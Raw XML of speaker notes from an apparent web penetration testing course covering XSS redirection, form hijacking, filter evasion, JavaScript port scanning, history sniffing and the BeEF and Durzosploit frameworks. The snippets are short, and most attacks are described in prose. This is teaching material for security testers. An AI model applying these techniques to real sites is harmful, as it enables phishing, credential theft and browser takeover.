          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We used this type of code during the XSS exercise on day 3.</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EBA80E9-A432-924F-A1F8-23BBC8C76B7A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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JavaScript shown above instructs the browser to change the location it is displaying. In this example, the location changes to otherpage.html. However, the location can be any page or site on the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using redirection, an attacker can control where on the Internet a user is visiting. Phishing sites use this type of an attack, by having the victim visit the actual trusted site (which happens to be vulnerable to XSS), and then redirecting the user to a different site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Note that if we are able to inject redirection code, we can inject code that changes where a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s login form is submitted. The user could actually be at their bank's web site, but because it is vulnerable to XSS, instead of submitting the form to the bank it actually submits it to the attacker's web site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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EC3CE581-B21B-1548-AD85-59E334B6CB20}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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All of the examples we'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ve discussed so far today are small script injections. The entire script can be loaded into an input field. However, it's hard to do really malicious things with 100 characters. JavaScript solves that problem for us, by giving us the ability to load a script from a remote site. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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E6FB0A1-828E-EC4D-98BB-9F799DD30036}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Many sites are configured to automatically block known malicious inputs. These blacklists are often trivial to bypass. Since the JavaScript and HTML languages are designed for flexibility, there are a plethora of ways to represent the same data, which can allow us to evade blocking mechanisms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The premier site for XSS evasion techniques is the XSS cheatsheet at http://ha.ckers.org/xss.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea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FCC245D5-EE42-9F4A-9998-9DCDD8A97295}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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During exploitation, we are able to expand the foothold the vulnerability exposes within the application.  By performing various exploits, we are able to pivot through this flaw and gain either further access or discover other flaws.  We can then launch further attacks, either into the tested application or deeper into the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This exploitation allows us to better understand the risks and possibilities the vulnerabilities expose.</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0CC8A8EC-2623-C143-87FC-3B2872002C42}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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On Day 3, we proved the existence of a XSS vulnerability using the simple example shown first on this slide. It is a typical XSS demonstration, in which JavaScript is used to open an alert box that says "XSS" with an "OK" button. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Two of the ways to change this to bypass filtering are shown. One method uses an image tag. Notice that the image source is the JavaScript. The other method uses a malformed image tag, which most modern browsers will render despite the fact that it is not valid. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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D45C7C6-8006-374B-BFE1-0259EB54EB6A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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On this slide we have included two more methods of encoding the script to bypass filters.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The first makes use of HTML entities.  In this case the entities are &amp;quot;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The second example uses hex encoding to write the various characters.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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27955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this exercise we will attack PHPBB with a persistent XSS attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27955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4145E4D-1AF3-CC4E-A784-77825091FD6C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28672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 will now look into some more advanced XSS attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28672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1638D2C-A74C-2641-9662-BE30DD31855D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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F96B679E-9B07-CE48-9DD4-17263F2B474F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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examples we have studied so far are very simple. They do not leverage the full power and imagination of malicious attackers. JavaScript is a full-blown programming language, and because of that, we are limited primarily by our imaginations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In the next slides, we will study some more advanced examples of XSS.</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039869F-CEC0-C849-8F47-A371B7BC6B34}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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685800" y="4560888"/>
            <a:ext cx="5897563"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Our first example of an advanced exploit is the implementation of a port scanner using JavaScript and IFRAMES. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A frameset in HTML is an old technology which allows the screen to be split into multiple frames, which each loads a separate HTML source.  IFRAMEs are based off of this concept. Using IFRAMEs, a web site developer can load a separate web page within a web page that a user has loaded. It is possible to set an IFRAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s visibility to "hidden," which means that the page will be loaded but not displayed. By adding a script to an IFRAME, we can insert scripts which are executed in the user's browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can use this to conduct internal port scanning. First, we determine the internal IP address range of the client system. (This will be explained on the next slide.) Next, we create a hidden IFRAME. The hidden IFRAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s source references another IP address within the internal address space. For example, if the client IP address is 10.0.0.3, the script might use 10.0.0.4. This will attempt to load a web page from the address 10.0.0.4. If the JavaScript "onload" action successfully executes, then the port is open.  By walking the full address space, we can compile a list of systems on the network that have port 80 open. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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070DFA32-7A56-B94E-B8E7-711399D36634}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Retrieving the internal address of the browser will allow the attacker to further attack the network the browser is on.  To get this address from JavaScript, the attacker needs to use a Java applet.  One of the best is MyAddress.class by Lars Kinderman.</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6B92051-E61D-4F4A-A7EE-0BE7AB787C92}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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first thing the attacker must do is create a MyAddress function in JavaScript.  This function accepts the IP as a parameter and does whatever the attacker would like.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Second, they load the MyAddress.class file. (The example below shows how.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>At this time the JavaScript code has access to the IP address!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	JavaScript Function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		&lt;script&gt; function MyAddress(IP) { alert("Your local IP is " + IP) } &lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	Applet Loading Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		&lt;APPLET CODE="MyAddress.class" MAYSCRIPT WIDTH=0 			HEIGHT=0&gt;&lt;/APPLET&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>		(The MAYSCRIPT parameter is how this is enabled.)</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76AD322-A804-3143-8E3C-E22A4851DD1B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Since we found web servers, let's find out what types of server they are running.  This is made easier since most servers ship with default graphic files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples of this are apache_pb.gif from the Apache HTTP server and the hp_invent_logo.gif which is on most HP devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' embedded web server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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691432D-15CD-084E-9DB4-7BA34792136F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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web server fingerprinting code creates an image tag.  This image tag references the default graphic being tested and has an onerror event.  If a valid image is found, the onerror event does not fire, signifying that we now know what the server is running.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10976768-8043-FC45-873F-9FA668D24053}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ve talked about many types of exploits over the past few days, but we will not discuss them all today. During the discovery phase, we validated that flaws existed by actually sending malicious traffic. For certain types of attacks, discovery of the flaw is enough of a validation. Cross Site Request Forgery is one example– once we validate that a site is vulnerable, further exploitation does not prove anything more or gain us further access. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Today, we will focus on three categories of exploits: authentication bypass, SQL injection, and session hijacking (with relation to XSS). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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AA0A47A-F368-AD4F-AC01-7ECDEF994AED}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Nikto is an excellent source of information regarding default image files.  It contains a database that includes this information.  And since it has already been used in our process, you already have access to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Yokoso! is another project that contains URI fingerprints for our use.  It is available at yokoso.secureideas.com and contains many different fingerprints.  It is actively looking to expand the list, so I think it is worth checking out.  (Of course I am the project lead, so I may be biased.)</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F516E16-E5B2-D24B-BCFB-A3CFF372CE61}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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838200" y="4560888"/>
            <a:ext cx="5638800"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code allows you to list a series of URLs and determine if the browser has visited them.  One example of this code is available at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.gnucitizen.org/projects/javascript-visited-link-scanner/. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is also part of the AttackAPI, which we will be discussing later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This screenshot is from the AttackAPI version of a history scanner.  The top box is the list of urls that will be checked and the bottom contains the results.  We will discuss the AttackAPI further on in the day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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881B02B-5310-8545-B560-3B44BF9B9FD2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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4400" y="4560888"/>
            <a:ext cx="5426075"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ability to determine if someone has visited a site gives us some valuable information.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The first is what sites should we target for DNS cache poisoning or targeted phishing attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The next allows us to check to see if the user has visited any administrative pages we have discovered.  This would signify that this user has elevated privileges and would be an excellent target for further exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping intranet sites is done by listing potential URLs for internal sites and seeing if the browser has been there.  Site names and URLs can be found by either guessing based on other sites, or information found during the reconnaissance phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The attacker is also able to discover network devices by listing the default pages for controlling these devices to see if they have been visited.</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29696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Durzosploit is a new engine designed to help build attack payloads.  It is similar to Metasploit in that it contains pre-built exploits and obfuscators to help hide the attacks.  We interact with it through a console interface, selecting each of the exploits and placing them into a session.  It will then output the attack payload to the file system.  Once it is built, we are able to obfuscate the payload to help bypass filtering and intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Durzosploit has been taken over by the Secure Ideas team and is part of SamuraiWTF.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29696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1D5C375-7899-814C-86A1-7E2D5E508ACF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29798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this exercise, we will explore Durzosploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29798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913E5A9-BB75-6944-89D8-9907BDDDF9B8}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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lide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30413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this next section we will cover some of the exploitation frameworks available.  These frameworks are used to perform more advanced attacks using XSS than most people know exist.  They also allow us to perform our testing easier and faster, while validating the vulnerability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30413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1860ADA-5EB4-C243-BD0C-47C8E58C4956}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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997F721-3B49-5846-A239-BF4C72A63C34}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Since client side scripts make use of a full programming language, they can be very powerful.  But with this power comes difficult code to write and maintain.  So let's use our computers to make it easier for us.  The exploit frameworks we are going to discuss will do a lot of the heavy lifting for us.</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03DB888-9771-9D4A-9E23-3112821DE702}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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We will be covering two frameworks in this section of the class. BeEF is a PHP based application that act as a controller and include the JavaScript to control the victim browser.</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870DB75-B5E7-8944-A908-0853999DEF9B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s take a moment and discuss zombies.  Zombies are browsers that have been taken over by the attacker.  The attacker is then able to control what the user does within that browser.  These are similar to bots being spread by worms, but instead of taking over the machine, they control the browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31744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cover BeEF, which is a very interesting framework.  It is the first inter-protocol exploitation framework to be released.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31744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88B22A72-534C-6340-B5FA-F9A2FBBECE4F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"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this section we will discuss authentication bypass and how it can be exploited.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20275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014FC5E8-F13C-9D43-906D-4C3785470654}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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F783870F-8142-4247-A9FF-2E51B038DBD3}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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BeEF is a framework for building attacks.  These attacks are then launched from the browser.  BeEF allows the attacker/developer to focus on payloads instead of how to get the attack to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
